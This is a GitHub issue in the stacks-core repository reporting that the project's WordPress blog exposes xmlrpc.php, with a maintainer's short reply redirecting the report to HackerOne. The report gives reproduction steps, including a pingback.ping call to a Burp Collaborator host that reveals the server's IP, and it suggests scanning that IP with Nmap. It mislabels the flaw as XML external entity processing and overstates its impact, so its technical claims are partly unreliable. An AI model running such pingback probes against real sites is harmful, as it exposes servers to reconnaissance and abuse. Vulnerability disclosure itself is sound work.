search

stacks-network / stacks-core

The Stacks blockchain implementation
https://docs.stacks.co
GNU General Public License v3.0
3.01k stars 667 forks source link

XML RPC File Enabled in https://blog.blockstack.org/ leading to DDOS Attacks #1823

Closed robertaaron1999 closed 4 years ago

robertaaron1999 commented 4 years ago

VULNERABILITY DESCRIPTION

This is a vulnerability which can lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

VULNERABILITY NAME

: XML EXTERNAL ENTITY PROCESSING ( Domain : https://blog.blockstack.org/ )

SEVERITY

: Medium

DESCRIPTION :

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

STEPS TO REPRODUCE :

1) Go to https://blog.blockstack.org/xmlrpc.php 2) You will see that " XML-RPC Server accepts POST Request only" 3) Reload the page and capture the request in Burp Suite 4) Send the request to repeater and replace "GET" with "POST" and click go 5)You will notice a HTTP 200 ok response 6) Remove the cookie data and add this below method

system.listMethods

7) You will notice all the methods display in the response columns (pingback method also displayed ) Critical

8) Now start the burp collaborator and take blog from the website and paste it in this code and run it in this code :

pingback.ping http://0lmlnzg4hhu11dslm6fsltrj9af03p.burpcollaborator.net https://blog.blockstack.org/

At the burp collaborator, You will receive the DNS Pingback where you can the server side IP address Now go to whatismyipaddress.com and select ip lookup and enter the found Server side IP and you will be able to see the geological location of the Server and all important information of the server You can use tools like Nmap to scan the ip found and hence gain all the critical information

IMPACT:

This attack may lead to remote code injection , disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

For More Information : https://www.hostinger.com/tutorials/xmlrpc-wordpress

RECOMMENDED FIX

1) Disabling Xmlrpc.php With Plugins ( Plugin Name : "Disable XML-RPC" ) 2) Disabling Xmlrpc.php Manually

POC ( Video and screenshot attached )

Name : Robert Aaron Phone : +971525284648 Handle: https://www.linkedin.com/in/robert-aaron-14735b188/

diwakergupta commented 4 years ago

Thanks @robertaaron1999 , please use hackerone.com/blockstack for any security disclosures. In any case this issue is not relevant to stacks-blockchain.

cc/ @cuevasm FYI w.r.t XML-RPC on our WP setup.